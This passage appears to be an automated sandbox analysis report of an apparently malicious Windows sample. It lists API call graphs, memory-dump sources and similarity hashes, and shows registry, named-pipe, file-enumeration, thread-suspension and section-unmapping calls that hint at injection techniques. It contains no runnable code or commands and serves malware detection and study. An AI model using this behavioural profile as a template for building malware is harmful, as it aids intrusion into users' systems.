    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
